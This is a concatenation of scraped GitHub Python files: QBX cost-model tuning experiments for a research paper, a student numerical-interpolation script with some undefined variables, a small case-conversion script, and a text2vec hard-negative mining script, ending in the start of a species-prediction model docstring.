args to QBXLayerPotentialSource\n which_op: \"S\" or \"D\"\n helmholtz_k: Helmholtz parameter\n\n Returns:\n A list of dictionaries, each of which holds the parameter value and\n cost model result\n \"\"\"\n param_values = list(param_values)\n task_params = []\n for value in param_values:\n task_param = lpot_kwargs.copy()\n task_param[param_name] = value\n task_params.append(task_param)\n\n with multiprocessing.Pool(POOL_WORKERS) as pool:\n results = pool.map(\n partial(\n get_lpot_cost,\n which_op, helmholtz_k, geometry_getter, kind=\"model\"),\n task_params)\n\n results = [\n {\n \"param_name\": param_name,\n \"param_value\": value,\n \"cost\": cost}\n for value, cost in zip(param_values, results)]\n\n return results\n\n\ndef get_optimal_parameter_value(results):\n \"\"\"Given a list of results as returned by *run_parameter_study*,\n return the parameter value minimizing total cost.\n \"\"\"\n best_result = min(\n results,\n key=lambda res: sum(res[\"cost\"].get_predicted_times().values()))\n\n return best_result[\"param_value\"]\n\n# }}}\n\n\n# {{{ geometry study - vary geometry with constant parameters\n\ndef run_geometry_study(geometry_getters, lpot_kwargs, which_op, helmholtz_k):\n \"\"\"Run the cost model over a set of geometries.\n\n Params:\n\n geometry_getters: Geometry getters\n lpot_kwargs: Constructor kwargs to QBXLayerPotentialSource\n which_op: \"S\" or \"D\"\n helmholtz_k: Helmholtz parameter\n\n Returns:\n\n A list of dictionaries, each of which contain a geometry label and a\n cost model output\n \"\"\"\n with multiprocessing.Pool(POOL_WORKERS) as pool:\n results = pool.map(\n partial(get_lpot_cost, which_op, helmholtz_k,\n lpot_kwargs=lpot_kwargs, kind=\"model\"),\n geometry_getters)\n\n results = [\n {\n \"geometry\": geo.label,\n \"cost\": cost}\n for geo, cost in zip(geometry_getters, results)]\n\n return results\n\n# }}}\n\n\n# {{{ green error study - obtain green error for a geometry family\n\ndef run_green_error_study(\n geometry_getters, lpot_kwargs, center, helmholtz_k):\n \"\"\"Compute the Green error for a family of geometries, in parallel.\n\n Params:\n\n geometry_getters: Geometry getters\n geometry_label: Geometry labels in output\n lpot_kwargs: Constructor kwargs to QBXLayerPotentialSource\n center: Center used for constructed density\n helmholtz_k: Helmholtz parameter\n\n Returns:\n\n A list of dictionaries, each of which contain a geometry label and an\n error result\n \"\"\"\n with multiprocessing.Pool(POOL_WORKERS) as pool:\n err_results = pool.map(\n partial(\n get_green_error,\n lpot_kwargs=lpot_kwargs, center=center, k=helmholtz_k),\n geometry_getters)\n\n results = [\n {\n \"geometry\": geo.label,\n \"error\": err}\n for geo, err in zip(geometry_getters, err_results)]\n\n return results\n\n# }}}\n\n\n# {{{ tune parameters for a single geometry\n\ndef run_tuning_study(\n tuning_geometry, lpot_kwargs, baseline_nmax_range,\n baseline_nmpole_range, tsqbx_nmax_range,\n tsqbx_nmpole_range, which_op, helmholtz_k):\n \"\"\"Find the parameters which give the best observed performance, with and\n without target-specific QBX.\n\n Params:\n\n tuning_geometry: Geometry getter\n label: Label for saving results\n lpot_kwargs: Base kwargs for the QBXLayerPotentialSource\n which_op: \"S\" or \"D\"\n helmholtz_k: Helmholtz parameter\n\n The arguments *baseline_nmax_range*, *baseline_nmpole_range*,\n *tsqbx_nmax_range*, *tsqbx_nmpole_range* are the ranges of values which\n are to be checked for the respective parameter value.\n \"\"\"\n lpot_kwargs = lpot_kwargs.copy()\n label = tuning_geometry.label\n\n # {{{ figure out baseline nmax\n\n logger.info(\"finding baseline value of nmax\")\n\n baseline_nmax_results = run_parameter_study(\n \"_max_leaf_refine_weight\",\n baseline_nmax_range,\n tuning_geometry,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"tuning-study-{label}-baseline-nmax.json\"\n with make_output_file(output_fname) as outfile:\n output_data(baseline_nmax_results, outfile)\n\n baseline_nmax = get_optimal_parameter_value(baseline_nmax_results)\n lpot_kwargs[\"_max_leaf_refine_weight\"] = baseline_nmax\n logger.info(\"baseline value of nmax: %d\", baseline_nmax)\n\n # }}}\n\n # {{{ figure out baseline nmpole\n\n logger.info(\"finding baseline value of nmpole\")\n\n baseline_nmpole_results = run_parameter_study(\n \"_from_sep_smaller_min_nsources_cumul\",\n baseline_nmpole_range,\n tuning_geometry,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"tuning-study-{label}-baseline-nmpole.json\"\n with make_output_file(output_fname) as outfile:\n output_data(baseline_nmpole_results, outfile)\n\n baseline_nmpole = get_optimal_parameter_value(baseline_nmpole_results)\n lpot_kwargs[\"_from_sep_smaller_min_nsources_cumul\"] = baseline_nmpole\n logger.info(\"baseline value of nmpole: %d\", baseline_nmpole)\n\n # }}}\n\n # {{{ figure out nmax for tsqbx\n\n logger.info(\"finding optimal nmax value when using tsqbx\")\n lpot_kwargs[\"_use_target_specific_qbx\"] = True\n\n tsqbx_nmax_results = run_parameter_study(\n \"_max_leaf_refine_weight\",\n tsqbx_nmax_range,\n tuning_geometry,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"tuning-study-{label}-tsqbx-nmax.json\"\n with make_output_file(output_fname) as outfile:\n output_data(tsqbx_nmax_results, outfile)\n\n tsqbx_nmax = get_optimal_parameter_value(tsqbx_nmax_results)\n lpot_kwargs[\"_max_leaf_refine_weight\"] = tsqbx_nmax\n logger.info(\"optimal nmax value for tsqbx: %d\", tsqbx_nmax)\n\n # }}}\n\n # {{{ figure out nmpole for tsqbx\n\n logger.info(\"finding optimal nmpole value for tsqbx\")\n\n tsqbx_nmpole_results = run_parameter_study(\n \"_from_sep_smaller_min_nsources_cumul\",\n tsqbx_nmpole_range,\n tuning_geometry,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"tuning-study-{label}-tsqbx-nmpole.json\"\n with make_output_file(output_fname) as outfile:\n output_data(tsqbx_nmpole_results, outfile)\n\n tsqbx_nmpole = get_optimal_parameter_value(tsqbx_nmpole_results)\n lpot_kwargs[\"_from_sep_smaller_min_nsources_cumul\"] = tsqbx_nmpole\n logger.info(\"optimal nmpole value for tsqbx: %d\", tsqbx_nmpole)\n\n # }}}\n\n result = dict(\n baseline_nmax=baseline_nmax,\n baseline_nmpole=baseline_nmpole,\n tsqbx_nmax=tsqbx_nmax,\n tsqbx_nmpole=tsqbx_nmpole)\n\n params_fname = f\"tuning-params-{label}.json\"\n with make_params_file(params_fname) as outfile:\n output_data(result, outfile)\n\n# }}}\n\n\n# {{{ collect results of applying optimizations on a set of geometries\n\ndef run_optimization_study(\n geometry_getters, label, lpot_kwargs, params, which_op, helmholtz_k):\n \"\"\"Apply a sequence of optimizations to a set of geometries and record\n performance results.\n\n Params:\n\n geometry_getters: List of geometry getters\n label: Label for saving results\n lpot_kwargs: Baseline kwargs for the QBXLayerPotentialSource\n params: Params obtained as result of *run_tuning_study*\n which_op: \"S\" or \"D\"\n helmholtz_k: Helmholtz parameter\n \"\"\"\n\n # {{{ opt level 0\n\n logger.info(\"Obtaining baseline performance\")\n\n lpot_kwargs = lpot_kwargs.copy()\n\n lpot_kwargs[\"_use_target_specific_qbx\"] = False\n lpot_kwargs[\"_max_leaf_refine_weight\"] = params[\"baseline_nmax\"]\n lpot_kwargs[\"_from_sep_smaller_min_nsources_cumul\"] = (\n params[\"baseline_nmpole\"])\n\n opt0_results = run_geometry_study(\n geometry_getters,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"optimization-study-{label}-opt0.json\"\n with make_output_file(output_fname) as outfile:\n output_data(opt0_results, outfile)\n\n # }}}\n\n # {{{ opt level 1\n\n logger.info(\"Obtaining performance with TSQBX\")\n\n lpot_kwargs[\"_use_target_specific_qbx\"] = True\n\n opt1_results = run_geometry_study(\n geometry_getters,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"optimization-study-{label}-opt1.json\"\n with make_output_file(output_fname) as outfile:\n output_data(opt1_results, outfile)\n\n # }}}\n\n # {{{ opt level 2\n\n logger.info(\"Obtaining performance with TSQBX + optimal nmax\")\n\n lpot_kwargs[\"_max_leaf_refine_weight\"] = params[\"tsqbx_nmax\"]\n\n opt2_results = run_geometry_study(\n geometry_getters,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"optimization-study-{label}-opt2.json\"\n with make_output_file(output_fname) as outfile:\n output_data(opt2_results, outfile)\n\n # }}}\n\n # {{{ opt level 3\n\n logger.info(\n \"Obtaining performance with TSQBX + \"\n \"optimal nmax + optimal nmpole\")\n\n lpot_kwargs[\"_from_sep_smaller_min_nsources_cumul\"] = (\n params[\"tsqbx_nmpole\"])\n\n opt3_results = run_geometry_study(\n geometry_getters,\n lpot_kwargs,\n which_op,\n helmholtz_k)\n\n output_fname = f\"optimization-study-{label}-opt3.json\"\n with make_output_file(output_fname) as outfile:\n output_data(opt3_results, outfile)\n\n # }}}\n\n# }}}\n\n\n# {{{ lpot kwargs\n\ndef urchin_lpot_kwargs():\n lpot_kwargs = DEFAULT_LPOT_KWARGS.copy()\n\n lpot_kwargs[\"performance_model\"] = PerformanceModel(\n calibration_params=load_params(\n \"calibration-params-urchin.json\"))\n\n assert lpot_kwargs[\"fmm_order\"] == 15\n assert lpot_kwargs[\"qbx_order\"] == 5\n\n return lpot_kwargs\n\n\ndef donut_lpot_kwargs():\n lpot_kwargs = DEFAULT_LPOT_KWARGS.copy()\n\n lpot_kwargs[\"performance_model\"] = PerformanceModel(\n calibration_params=load_params(\n \"calibration-params-donut.json\"))\n\n lpot_kwargs[\"fmm_order\"] = 20\n lpot_kwargs[\"qbx_order\"] = 9\n\n return lpot_kwargs\n\n\ndef plane_lpot_kwargs():\n lpot_kwargs = DEFAULT_LPOT_KWARGS.copy()\n\n lpot_kwargs[\"performance_model\"] = PerformanceModel(\n calibration_params=load_params(\n \"calibration-params-plane.json\"))\n\n # These are supplied by the geometry getter.\n del lpot_kwargs[\"qbx_order\"]\n del lpot_kwargs[\"fmm_order\"]\n del lpot_kwargs[\"fmm_backend\"]\n\n return lpot_kwargs\n\n# }}}\n\n\n# {{{ fit calibration params\n\ndef fit_calibration_params(geometry_getters, lpot_kwargs_list, which_op, helmholtz_k):\n \"\"\"Find calibration parameters for running a layer potential operator\n on a particular list of geometries.\n\n Params:\n geometry_getters: A list of geometry getters\n lpot_kwargs_list: A list of corresponding lpot kwargs\n which_op: \"S\" or \"D\"\n helmholtz_k: Helmholtz parameter\n\n Returns:\n A dictionary containing keys *model_results*, *timing_results*\n and *calibration_params*.\n \"\"\"\n context = cl.create_some_context(interactive=False)\n queue = cl.CommandQueue(context)\n\n from pytential.qbx.performance import (\n PerformanceModel, estimate_calibration_params)\n\n model_results = []\n timing_results = []\n\n for geo_getter, lpot_kwargs in zip(geometry_getters, lpot_kwargs_list):\n model_result = get_lpot_cost(which_op, helmholtz_k,\n geo_getter, lpot_kwargs, \"model\")\n model_results.append(model_result)\n timing_result = get_lpot_cost(which_op, helmholtz_k,\n geo_getter, lpot_kwargs, \"actual\")\n timing_results.append(timing_result)\n\n result = {}\n result[\"model_results\"] = model_results\n result[\"timing_results\"] = timing_results\n result[\"calibration_params\"] = (\n estimate_calibration_params(model_results, timing_results))\n\n return result\n\n# }}}\n\n\ndef run_urchin_calibration_params_experiment():\n urchins = (\n urchin_geometry_getter(3),\n urchin_geometry_getter(3),\n urchin_geometry_getter(5),\n urchin_geometry_getter(5))\n\n lpot_kwargs_nots = urchin_lpot_kwargs()\n lpot_kwargs_ts = lpot_kwargs_nots.copy()\n lpot_kwargs_ts[\"_use_target_specific_qbx\"] = True\n\n lpot_kwargs_list = (\n lpot_kwargs_nots,\n lpot_kwargs_ts,\n lpot_kwargs_nots,\n lpot_kwargs_ts)\n\n result = fit_calibration_params(urchins, lpot_kwargs_list, \"S\", 0)\n\n with make_output_file(\"calibration-params-fitting-urchin.json\") as outfile:\n output_data(result, outfile)\n\n with make_params_file(\"calibration-params-urchin.json\") as outfile:\n output_data(result[\"calibration_params\"], outfile)\n\n\ndef run_urchin_time_prediction_experiment():\n urchins = [urchin_geometry_getter(k) for k in URCHIN_PARAMS]\n\n results = run_geometry_study(urchins, urchin_lpot_kwargs(), \"S\", 0)\n\n with make_output_file(\"time-prediction-urchin-modeled-costs.json\")\\\n as outfile:\n output_data(results, outfile)\n\n\ndef run_urchin_tuning_study_experiment():\n tuning_urchin = urchin_geometry_getter(TUNING_URCHIN, \"urchin\")\n\n baseline_nmax_range = range(32, 512, 32)\n baseline_nmpole_range = range(0, 300, 20)\n tsqbx_nmax_range = range(32, 2000, 64)\n tsqbx_nmpole_range = range(0, 500, 20)\n\n run_tuning_study(\n tuning_urchin, urchin_lpot_kwargs(),\n baseline_nmax_range, baseline_nmpole_range,\n tsqbx_nmax_range, tsqbx_nmpole_range,\n which_op=\"S\", helmholtz_k=0)\n\n\ndef run_urchin_optimization_study_experiment():\n tuning_params = load_params(\"tuning-params-urchin.json\")\n\n urchins = [urchin_geometry_getter(k) for k in URCHIN_PARAMS]\n\n run_optimization_study(\n urchins, \"urchin\", urchin_lpot_kwargs(),\n tuning_params, \"S\", helmholtz_k=0)\n\n\ndef run_urchin_green_error_experiment():\n urchins = [urchin_geometry_getter(k) for k in URCHIN_PARAMS]\n center = np.array([3., 1., 2.])\n\n results = run_green_error_study(\n urchins, urchin_lpot_kwargs(), center, helmholtz_k=0)\n\n with make_output_file(\"green-error-urchin.json\") as outfile:\n output_data(results, outfile)\n\n\ndef run_donut_calibration_params_experiment():\n # nrows=5 is the same as tau_{10}\n donuts = (\n donut_geometry_getter(5, \"donut\"),\n donut_geometry_getter(5, \"donut\"))\n\n lpot_kwargs_nots = donut_lpot_kwargs()\n lpot_kwargs_ts = lpot_kwargs_nots.copy()\n lpot_kwargs_ts[\"_use_target_specific_qbx\"] = True\n\n lpot_kwargs_list = (\n lpot_kwargs_nots,\n lpot_kwargs_ts)\n\n result = fit_calibration_params(donuts, lpot_kwargs_list, \"S\", 0)\n\n with make_output_file(\"calibration-params-fitting-donut.json\") as outfile:\n output_data(result, outfile)\n\n with make_params_file(\"calibration-params-donut.json\") as outfile:\n output_data(result[\"calibration_params\"], outfile)\n\n\ndef run_donut_tuning_study_experiment():\n # nrows=5 is the same as tau_{10}\n tuning_donut = donut_geometry_getter(5, \"donut\")\n\n baseline_nmax_range = range(32, 512, 32)\n baseline_nmpole_range = range(0, 300, 20)\n tsqbx_nmax_range = range(32, 2000, 64)\n tsqbx_nmpole_range = range(0, 500, 20)\n\n run_tuning_study(\n tuning_donut, donut_lpot_kwargs(),\n baseline_nmax_range, baseline_nmpole_range,\n tsqbx_nmax_range, tsqbx_nmpole_range,\n which_op=\"S\", helmholtz_k=0)\n\n\ndef run_donut_optimization_study_experiment():\n tuning_params = load_params(\"tuning-params-donut.json\")\n donut = [donut_geometry_getter(5)]\n\n run_optimization_study(\n donut, \"donut\", donut_lpot_kwargs(),\n tuning_params, \"S\", helmholtz_k=0)\n\n\ndef run_donut_green_error_experiment():\n donut = [donut_geometry_getter(5)]\n center = np.array([0.] * 3)\n\n results = run_green_error_study(\n donut, donut_lpot_kwargs(), center, helmholtz_k=0)\n\n with make_output_file(\"green-error-donut.json\") as outfile:\n output_data(results, outfile)\n\n\ndef run_plane_calibration_params_experiment():\n planes = (\n plane_geometry_getter(),\n plane_geometry_getter())\n\n lpot_kwargs_nots = plane_lpot_kwargs()\n lpot_kwargs_ts = lpot_kwargs_nots.copy()\n lpot_kwargs_ts[\"_use_target_specific_qbx\"] = True\n\n lpot_kwargs_list = (\n lpot_kwargs_nots,\n lpot_kwargs_ts)\n\n result = fit_calibration_params(planes, lpot_kwargs_list, \"D\", 20)\n\n with make_output_file(\"calibration-params-fitting-plane.json\") as outfile:\n output_data(result, outfile)\n\n with make_params_file(\"calibration-params-plane.json\") as outfile:\n output_data(result[\"calibration_params\"], outfile)\n\n\ndef run_plane_tuning_study_experiment():\n tuning_plane = plane_geometry_getter()\n\n baseline_nmax_range=range(50, 200, 50)\n baseline_nmpole_range=range(10, 100, 10)\n tsqbx_nmax_range=range(100, 500, 50)\n tsqbx_nmpole_range=range(50, 300, 50)\n\n run_tuning_study(\n tuning_plane, plane_lpot_kwargs(),\n baseline_nmax_range, baseline_nmpole_range,\n tsqbx_nmax_range, tsqbx_nmpole_range,\n which_op=\"D\", helmholtz_k=20)\n\n\ndef run_plane_optimization_study_experiment():\n tuning_params = load_params(\"tuning-params-plane.json\")\n plane = [plane_geometry_getter()]\n\n run_optimization_study(\n plane, \"plane\", plane_lpot_kwargs(),\n tuning_params, \"D\", helmholtz_k=20)\n\n\ndef run_plane_bvp_experiment():\n if any(\n os.path.exists(os.path.join(BVP_OUTPUT_DIR, fname))\n for fname in (\n \"potential-0.25.vts\", \"result.pkl.gz\", \"source-0.25.vtu\")):\n raise RuntimeError(\n \"not running plane-bvp experiment - delete or move \"\n \"the output files in \"\n \"the directory '%s' to run\" % BVP_OUTPUT_DIR)\n\n lpot_kwargs = plane_lpot_kwargs()\n\n tuning_params = load_params(\"tuning-params-plane.json\")\n lpot_kwargs[\"_use_target_specific_qbx\"] = True\n lpot_kwargs[\"_max_leaf_refine_weight\"] = (\n tuning_params[\"tsqbx_nmax\"])\n lpot_kwargs[\"_from_sep_smaller_min_nsources_cumul\"] = (\n tuning_params[\"tsqbx_nmpole\"])\n\n cl_ctx = cl.create_some_context(interactive=False)\n queue = cl.CommandQueue(cl_ctx)\n\n from inteq_tests import (\n run_int_eq_test, BetterplaneIntEqTestCase)\n\n result = run_int_eq_test(\n cl_ctx,\n queue,\n BetterplaneIntEqTestCase(20, \"dirichlet\", +1),\n resolution=0.25,\n visualize=True,\n lpot_kwargs=lpot_kwargs,\n output_dir=BVP_OUTPUT_DIR)\n\n gmres_result = result.gmres_result\n\n result_dict = dict(\n h_max=result.h_max,\n rel_err_2=result.rel_err_2,\n rel_err_inf=result.rel_err_inf,\n rel_td_err_inf=result.rel_td_err_inf,\n gmres_result=dict(\n solution=gmres_result.solution.get(queue),\n residual_norms=gmres_result.residual_norms,\n iteration_count=gmres_result.iteration_count,\n success=gmres_result.success,\n stat=gmres_result.state))\n\n with gzip.open(os.path.join(BVP_OUTPUT_DIR, \"result.pkl.gz\"), \"wb\")\\\n as outfile:\n pickle.dump(result_dict, outfile)\n\n\ndef run_experiments(experiments):\n # Urchin calibration params\n if \"urchin-calibration-params\" in experiments:\n run_urchin_calibration_params_experiment()\n\n # Time prediction\n if \"urchin-time-prediction\" in experiments:\n run_urchin_time_prediction_experiment()\n\n # Tuning study for urchins\n if \"urchin-tuning-study\" in experiments:\n run_urchin_tuning_study_experiment()\n\n # Optimization study for urchin family\n if \"urchin-optimization-study\" in experiments:\n run_urchin_optimization_study_experiment()\n\n # Green error for urchin family\n if \"urchin-green-error\" in experiments:\n run_urchin_green_error_experiment()\n\n # Torus grid calibration params\n if \"donut-calibration-params\" in experiments:\n run_donut_calibration_params_experiment()\n\n # Optimization study for torus grid\n if \"donut-optimization-study\" in experiments:\n run_donut_optimization_study_experiment()\n\n # Tuning study for torus grid\n if \"donut-tuning-study\" in experiments:\n run_donut_tuning_study_experiment()\n\n # Green error for torus grid\n if \"donut-green-error\" in experiments:\n run_donut_green_error_experiment()\n\n # Plane calibration params\n if \"plane-calibration-params\" in experiments:\n run_plane_calibration_params_experiment()\n\n # Plane tuning study\n if \"plane-tuning-study\" in experiments:\n run_plane_tuning_study_experiment()\n\n # Plane tuning study\n if \"plane-optimization-study\" in experiments:\n run_plane_optimization_study_experiment()\n\n # Plane BVP\n if \"plane-bvp\" in experiments:\n run_plane_bvp_experiment()\n\n\nEXPERIMENTS = (\n \"urchin-calibration-params\",\n \"urchin-time-prediction\",\n \"urchin-tuning-study\",\n \"urchin-optimization-study\",\n \"urchin-green-error\",\n\n \"donut-calibration-params\",\n \"donut-tuning-study\",\n \"donut-optimization-study\",\n \"donut-green-error\",\n\n \"plane-calibration-params\",\n \"plane-tuning-study\",\n \"plane-optimization-study\",\n \"plane-bvp\",\n)\n\n\ndef main():\n description = \"This script collects data from one or more experiments.\"\n experiments = utils.parse_experiments_from_command_line(\n description, EXPERIMENTS)\n run_experiments(experiments)\n\n\nif __name__ == \"__main__\":\n # Avoid issues with fork()-based multiprocessing and pyopencl - see\n # https://github.com/inducer/pyopencl/issues/156\n multiprocessing.set_start_method(\"spawn\")\n main()\n\n\n# vim: foldmethod=marker\n","repo_name":"mattwala/gigaqbx-ts-paper-code","sub_path":"generate-data.py","file_name":"generate-data.py","file_ext":"py","file_size_in_byte":33998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39219291227","text":"import numpy as np\n\ndef metodo_newton():\n\tqtde_pontos = int(input(\"Quantos pontos?\"))\n\tpontos, fPontos =[], []\n\ttabela = []\n\t\n\tfor i in range(qtde_pontos):\n\t\tponto = float(input('x%d=' %i))\n\t\tfPonto = float(input('y%d=' %i))\n\t\tpontos.append(ponto)\n\t\tfPontos.append(fPonto)\n\ttabela.append(fPontos)\n\n\tx = float(input(\"ponto a ser estimado\"))\n\t\n\tpasso = 1\n\tfor n in range(qtde_pontos - 1):\n\t\tordem =[]\n\t\tfor m in range(len(tabela[n]) - 1):\n\t\t\tdiferencaDividida = (tabela[n][m + 1] - tabela[n][m])/(pontos[m + passo] - pontos[m])\n\t\t\tordem.append(diferencaDividida)\n\t\ttabela.append(ordem)\n\t\tpasso += 1\n\n\tfor k in range(len(tabela)):\n\t\tprint('Ordem %d: '%k, tabela[k])\n\tprint()\n\n\tfor i in range(len(tabela)):\n\t\tfator = tabela[i][0]\n\t\tfor j in range(grau):\n\t\t\tfator *= (x - pontos[j])\n\t\tgrau += 1\n\t\taprox += fator\n\n\tprint('Aproximação encontrada= %f', aprox)\n\ndef lagrange(qtde_pontos):\n\tX, Y = [], []\n\n\tfor i in range(qtde_pontos):\n\t\tx = float(input(\"x\" + str(i) + \"=\"))\n\t\tX.append(x)\n\t\ty = float(input(\"y\" + str(i) + \"=\"))\n\t\tY.append(y)\n\n\tx = float(input(\"valor a interpolar\"))\n\tcoeficientes =[]\n\n\tfor indice in range(qtde_pontos):\n\t\tL = 1\n\t\tfor j in range(len(X)):\n\t\t\tif indice != j:\n\t\t\t\tL *= (x - X[j])/(X[indice] - X[j])\n\t\tcoeficientes.append(L)\n\n\tpn = 0\n\n\tfor i in range(len(coeficientes)):\n\t\tpn += Y[i] * coeficientes[i]\n\n\tprint(\"p(\"+str(x)+\") = \", pn)\n\ndef gregory_newton(m, x, y, z):\n\txx = np.arange(0, 0.9, 0.01)\n\tf = []\n\n\tfor ii in range(len(xx)):\n\t\ty = z\n\t\tp = y[0]\n\t\ta = []\n\t\th = x[1] - x[0]\n\t\ts0 = (xx[ii] - x[0])/h\n\t\ts = 1\n\t\ta.append(y[0])\n\t\tfor i in range(m - 1):\n\t\t\tdelf = []\n\t\t\tfor j in range(m - 1 - i):\n\t\t\t\tdelf.append(y[j + 1] - y[j])\n\t\t\ts *= (s0 - i) / (i + 1)\n\t\t\tp += s * delf[0]\n\t\t\ty = delf\n\t\t\ta.append(y[0])\n\t\tf.append(p)\n\tprint(xx[-1], p)\n\nprint(\"----------MENU----------\")\nprint(\"1 - Newton\")\nprint(\"2 - Lagrange\")\nprint(\"3 - Gregory-Newton\")\nprint(\"------------------------\")\nprint(\"Informe o método\")\nmet = input()\n\nif met == \"1\":\n\t'''\n\tprint(\"Entradas do exemplo 4.6\")\n\tmetodo_newton(4, 0.5, 0, 0)\n\t'''\n\tmetodo_newton()\nelif met == \"2\":\n\tqtde_pontos = int(input(\"Quantos pontos?\"))\n\tlagrange(3)\nelif met == \"3\":\n\tm = 5\n\tx = [0, 0.2, 0.4, 0.6, 0.8]\n\ty = [0.12, 0.46, 0.74, 0.9, 1.2]\n\tz = y\n\tgregory_newton(m, x, y, z)\nelse:\n\tprint(\"Entrada invalida\")\n","repo_name":"lucasvlbsnts/algoritmos-calculo-numerico","sub_path":"tc4.py","file_name":"tc4.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9297423144","text":"s=input()\n\ndef convert(s):\n count_up=0\n count_low=0\n for c in s:\n if c.isupper():\n count_up+=1\n if c.islower():\n count_low+=1\n if count_up>count_low:\n print(s.upper())\n else:\n print(s.lower())\n\nconvert(s)","repo_name":"duongquy2404/sourceCodePython","sub_path":"chuHoaChuThuong.py","file_name":"chuHoaChuThuong.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31834711133","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author:XuMing(xuming624@qq.com)\n@description:\n\ncode from https://github.com/FlagOpen/FlagEmbedding\n\"\"\"\n\nimport argparse\nimport json\nimport random\nimport sys\n\nimport faiss\nfrom tqdm import tqdm\n\nsys.path.append('../..')\nfrom text2vec import SentenceModel\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_name_or_path', default=\"BAAI/bge-large-zh-noinstruct\", type=str)\n parser.add_argument('--input_file', default='nli-zh-bge/nli_zh-train.jsonl', type=str)\n parser.add_argument('--candidate_pool', default='STS-B/STS-B.train.data', type=str)\n parser.add_argument('--output_file', default='bge_finetune_data.jsonl', type=str)\n parser.add_argument('--batch_size', default=128, type=int)\n parser.add_argument('--range_for_sampling', default='2-20', type=str, help=\"range to sample negatives\")\n parser.add_argument('--use_gpu_for_searching', action='store_true', help='use faiss-gpu')\n parser.add_argument('--negative_number', default=10, help='use faiss-gpu')\n return parser.parse_args()\n\n\ndef create_index(embeddings, use_gpu):\n index = faiss.IndexFlatIP(len(embeddings[0]))\n if use_gpu:\n print('use faiss-gpu')\n co = faiss.GpuMultipleClonerOptions()\n co.shard = True\n co.useFloat16 = True\n index = faiss.index_cpu_to_all_gpus(index, co=co)\n index.add(embeddings)\n return index\n\n\ndef batch_search(\n index,\n query,\n topk: int = 200,\n batch_size: int = 64\n):\n all_scores, all_inxs = [], []\n for start_index in tqdm(range(0, len(query), batch_size), desc=\"Batches\", disable=len(query) < batch_size):\n batch_query = query[start_index:start_index + batch_size]\n batch_scores, batch_inxs = index.search(batch_query, k=topk)\n all_scores.extend(batch_scores.tolist())\n all_inxs.extend(batch_inxs.tolist())\n return all_scores, all_inxs\n\n\ndef get_corpus(candidate_pool):\n corpus = []\n for line in open(candidate_pool, 'r', encoding='utf-8'):\n parts = line.strip().split('\\t')\n txt1 = parts[0].strip()\n txt2 = parts[1].strip()\n corpus.append(txt1)\n corpus.append(txt2)\n return corpus\n\n\ndef find_knn_neg(\n model,\n input_file,\n candidate_pool,\n output_file,\n sample_range,\n negative_number,\n use_gpu,\n batch_size\n):\n corpus = []\n queries = []\n train_data = []\n for line in open(input_file, 'r', encoding='utf-8'):\n line = json.loads(line.strip())\n train_data.append(line)\n corpus.extend(line['neg'])\n queries.append(line['query'])\n\n if candidate_pool is not None:\n corpus = get_corpus(candidate_pool)\n corpus = list(set(corpus))\n\n print(f'inference embedding for corpus (number={len(corpus)})--------------')\n p_vecs = model.encode(corpus, batch_size=batch_size, normalize_embeddings=True)\n print(f'inference embedding for queries (number={len(queries)})--------------')\n q_vecs = model.encode(queries, batch_size=batch_size, normalize_embeddings=True)\n\n print('create index and search------------------')\n index = create_index(p_vecs, use_gpu=use_gpu)\n _, all_inxs = batch_search(index, q_vecs, topk=sample_range[-1], batch_size=batch_size)\n assert len(all_inxs) == len(train_data)\n\n for i, data in enumerate(train_data):\n query = data['query']\n inxs = all_inxs[i][sample_range[0]:sample_range[1]]\n filtered_inx = []\n for inx in inxs:\n if inx == -1:\n break\n if corpus[inx] not in data['pos'] and corpus[inx] != query:\n filtered_inx.append(inx)\n\n if len(filtered_inx) > negative_number:\n filtered_inx = random.sample(filtered_inx, negative_number)\n data['neg'] = [corpus[inx] for inx in filtered_inx]\n\n with open(output_file, 'w', encoding='utf-8') as f:\n for data in train_data:\n if len(data['neg']) < negative_number:\n data['neg'].extend(random.sample(corpus, negative_number - len(data['neg'])))\n f.write(json.dumps(data, ensure_ascii=False) + '\\n')\n\n\nif __name__ == '__main__':\n args = get_args()\n print(args)\n sample_range = args.range_for_sampling.split('-')\n sample_range = [int(x) for x in sample_range]\n\n model = SentenceModel(args.model_name_or_path)\n\n find_knn_neg(\n model,\n input_file=args.input_file,\n candidate_pool=args.candidate_pool,\n output_file=args.output_file,\n sample_range=sample_range,\n negative_number=args.negative_number,\n use_gpu=args.use_gpu_for_searching,\n batch_size=args.batch_size\n )\n","repo_name":"shibing624/text2vec","sub_path":"examples/data/hard_negatives_mine.py","file_name":"hard_negatives_mine.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":3412,"dataset":"github-code","pt":"19"} +{"seq_id":"20501614705","text":"'''\n- extract all pixel information from the images to a csv file\n- use average pixel value of each channel and round to 2 decimals (save as csv)\n- used columns \"latitude\" and \"longitude\" from occurrences and merge all information to one csv\n- calculate species groups with similar species:\n - remove species which occur < 10\n - look at the most common values for each species\n - calculate difference\n - take threshold '3' for building groups -> 2090 groups (366 species in groups with size greater than 1)\n- predict each group with one model separately (2090 different models)\n- each group contained several species which were ordered with regard of their probability in the trainset. After predicting a group on the testset we counted this prediction as predicting all classes of the group with descending probabilities.\nTest-mrr with groups: 0.022000386535744\n'''\n\nimport pandas as pd\nimport numpy as np\nimport xgboost as xgb\nimport matplotlib.pyplot as plt\nimport multiprocessing as mp\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import log_loss\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\n\nfrom geo.models.settings import seed\nfrom geo.models.settings import train_val_split\nfrom geo.models.settings import 